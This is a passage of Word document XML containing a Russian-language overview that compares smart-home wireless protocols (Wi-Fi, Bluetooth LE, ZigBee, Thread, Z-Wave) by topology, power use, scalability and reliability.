      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B19F4" w:rsidRPr="0044023C">
        <w:t>) связь обеспечивается через соседние точки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003143D6" w:rsidRPr="0044023C" w:rsidRDefault="003143D6" w:rsidP="00C07525">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="0044023C" w:rsidRDefault="003143D6" w:rsidP="0044023C">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0044023C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5939343" cy="2283979"/>
            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
            <wp:docPr id="11" name="Рисунок 11" descr="https://habrastorage.org/files/cef/5f8/40a/cef5f840ae344c349561eeb9940c3a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files/cef/5f8/40a/cef5f840ae344c349561eeb9940c3a4c.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3848"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="2284395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F68AA" w:rsidRPr="0044023C" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="0044023C">
        <w:t>Рис</w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:t xml:space="preserve">унок </w:t>
      </w:r>
      <w:r w:rsidRPr="0044023C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="0044023C">
        <w:t xml:space="preserve"> Сеть типа "звезда" (слева), ячеистая сеть (справа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 802.11 b/g/n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является наиболее известным протоколом в настоящее время. Большинство из нас используют его в своих домах каждый день уже более десяти лет. Широкое использование этой технологии обеспечивается наличием открытых и постоянно обновляемых Институтом инженеров по электротехнике и радиоэлектронике (IEEE) стандартов, имеющих буквенные </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">обозначения (b/g/n), и сертификацией готовых устройств, выполняемой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Alliance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Главным преимуществом </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является то, что он знаком всем потребителям (первая версия </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> был впервые разработана в 1991 году) и это дает ощущение, что он является более простым по сравнению с другими протоколами. С этой точки зрения наиболее технически подкованные собственники жилья (а скорее именно они будут основными потребителями продуктов для умного дома) сами в состоянии перезагрузить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> роутер для решения основных проблем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="0044023C" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Стандарт </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> определяет только низкие уровни взаимодействия умных устройств, такие как методы передачи данных в двоичном виде и контроль ошибок. Для обеспечения же общения устройств на одном языке должен быть стандартизован верхний, прикладной уровень протокола.</w:t>
      </w:r>
      <w:r w:rsidR="0044023C" w:rsidRPr="0044023C">
        <w:t xml:space="preserve"> [3]</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> И так как каждый производитель может самостоятельно определять прикладной уровень, то обеспечить связь между устройствами будет сложно или невозможно, до тех пор, пока две компании не определят их совместно. Это ограничивает использование </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> в устройствах для умного дома. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> также предполагает наличие центральной точки доступа в сеть, которая означает, что если точка доступа не работает, то сеть перестает функционировать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E239C" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> потребляет относительно много энергии по сравнению с другими протоколами, поэтому отлично подходит для использования в аппаратуре с питанием от силовой сети и ограниченно подходит для автономных устройств. Кроме того </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> также имеет сложности в вопросах масштабируемости. Например, некоторые маршрутизаторы поддерживают подключение не более 15 устройств, а в умном доме, ожидается, что их будет около сотни. Еще одной проблемой является конкуренция за </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> сеть различных источников данных. Если у вас</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">потоковое видео конкурирует с термостатом, то оба устройства могут не получить необходимую для них полосу пропускания. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Примечание: зависимость устойчивости работы всех устройств от одного шлюза приводит к появлению того, что известно как “единая точка отказа”. Это означает, что если шлюз становится неработоспособным, то ни одно из устройств в сети не сможет взаимодействовать, что в свою очередь приводит в «падению» всей сети. Наличие таких единых точек отказа очень нежелательно, т.к. это повышает уязвимость системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth™ Smart Low Energy (LE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="0044023C" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> – это протокол, работающий на малых расстояниях, который широко используется в смартфонах. Хотя он не требует специального шлюза для работы, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>т.к</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> он для этой цели уже использует смартфон или мобильное устройство, у него есть некоторые недостатки. Он использует топологию сети «точка-точка», что ограничивает его дальность действия и надежность. Если ваш</w:t>
      </w:r>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t>устройство</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> находится вне диапазона, то связь теряется. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> в настоящее время не поддерживает IP-адресацию</w:t>
      </w:r>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t>mesh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t>-сети</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>, однако разрабатывается новый стандарт для решения этого вопроса.</w:t>
      </w:r>
      <w:r w:rsidR="0044023C" w:rsidRPr="0044023C">
        <w:t>[3]</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="источники"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="00393F36" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> имеет стандартные протоколы прикладного уровня, но они, как правило, предназначены для связи телефонов и ПК, а не для устройств умного дома.</w:t>
      </w:r>
      <w:r w:rsidR="00393F36" w:rsidRPr="00393F36">
        <w:t>[5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="0044023C">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="0044023C" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> впервые был стандартизирован в 2004 году, он отличается более низким потреблением энергии в сравнении с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> работает на основе спецификации физического уровня IEEE 802.15.4</w:t>
      </w:r>
      <w:r w:rsidR="009A3D41" w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee в настоящее время используется в ячеистых сетях для домашней автоматизации и для промышленного использования.</w:t>
      </w:r>
      <w:r w:rsidR="0044023C" w:rsidRPr="0044023C">
        <w:t>[4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> создала несколько протоколов прикладного уровня для применения в широком спектре устройств для дома и бизнеса. Эти протоколы были разработаны в рамках альянса компаний, что обеспечило создание экосистемы продуктов и наличие конкурирующих поставщиков микросхем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Преимуществами протокола </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является надежность, масштабируемость и способность самовосстановления своей ячеистой сети:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Надежность</w:t>
      </w:r>
      <w:r w:rsidR="00C14C68" w:rsidRPr="000C799E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>устройства</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> могут общаться друг с другом, даже если шлюз не работает или его нет совсем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Масштабируемость: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> и другие протоколы на базе 802.15.4 имеют неограниченное число устройств. Вы можете добавить десятки, даже сотни устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Самовосстановление: если координатор сети PAN координатор не доступен, ячейка сети плавно переключается и продолжает функционировать. Для понимания это можно сравнить с RAID для вашего компьютера. Если жесткий диск выходит из строя, то второй зеркальный жесткий диск обеспечивает сохранение данных и работа не прерывается. В случае домашней автоматизации, это означает, что ваш термостат по-прежнему работает, даже если ваш шлюз не работает.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009369F2" w:rsidRPr="00393F36" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Проблемой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является наличие нескольких стандартов прикладного уровня (4 спецификации и более 10 стандартов), что приводит к сложностям совместной работы различного оборудования и даже несовместимости. Кроме того </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> не использует прямую IP-адресацию, устройства </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> для общения с устройствами в интернет требуют перевод адреса и прикладного уровня, тем самым создавая шлюз потенциальной точкой.</w:t>
      </w:r>
      <w:r w:rsidR="00393F36" w:rsidRPr="00393F36">
        <w:t>[6]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="00F00A9D" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> – это новый открытый стандарт, который поддерживает IP адресацию каждого устройства в сети, поэтому устройства могут общаться без необходимости использования шлюза, что устраняет единую точку отказа.</w:t>
      </w:r>
      <w:r w:rsidR="00B46FF4" w:rsidRPr="00B46FF4">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00F00A9D">
        <w:t>7]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Поток имеет три основных преимущества:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Масштабируемость: в умном доме могут быть подключены сотни устройств. Если вам кажется, что много, просто подумайте, что каждое окно и дверь будет иметь свой датчик, а для каждой комнаты будет </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>осуществляться мониторинг температуры и влажности. В этом случае, сложность и масштаб растет в геометрической прогрессии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Совместимость: учитывая такое количество устройств в одной ячеистой сети необходимо что бы все они общались между собой и с хозяином дома наиболее эффективно.</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00F00A9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00393F36">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00F00A9D">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00393F36">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Менее дорогое и сложное оборудование: известно, что по мере роста популярности технологии стоимость устройств уменьшается. Технологии на основе IP хорошо известны и просты в настройке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009369F2" w:rsidRPr="00F00A9D" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Пока </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> находится в стадии </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>разработки</w:t>
      </w:r>
      <w:r w:rsidR="004E239C" w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>Любой</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> продукт, использующий существующие микросхемы совместимые с протоколом 802.15.4 может быть в будущем обновлен по воздуху для обеспечения поддержки IP протокола </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00F00A9D">
        <w:t>.[9]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> протокол, разработанный специально для управления, мониторинга и считывания статуса жилых и небольших коммерческих зданиях. Зрелый, проверенный и широко использующийся во всем мире, Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является одним из самых популярных протоколов на рынке беспроводного управления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="000C799E" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> использует радиокомпоненты от одного поставщика - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Sigma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Designs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>, который является ключевым участником Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Alliance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>, объединяющий 250 компаний. Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> использует маломощные сети ячеистой топологии в диапазоне 900 МГц. Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> имеет программу сертификации, гарантирующую совместимость всех изделий Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>, в том числе обратную совместимость в будущем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B19F4" w:rsidRPr="00F00A9D" w:rsidRDefault="008B19F4" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Основной особенностью, которая отличает Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> от других технологий является реализация обработки связи между узлами сети на прикладном уровне. Экосистема умного дома Z-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Wave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> имеет более чем 1000 продуктов, которые полностью совместимы, независимо от марки продукта </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
